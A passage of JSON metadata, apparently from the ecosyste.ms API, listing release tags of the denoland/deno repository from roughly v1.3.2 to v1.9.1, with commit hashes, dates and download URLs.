.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/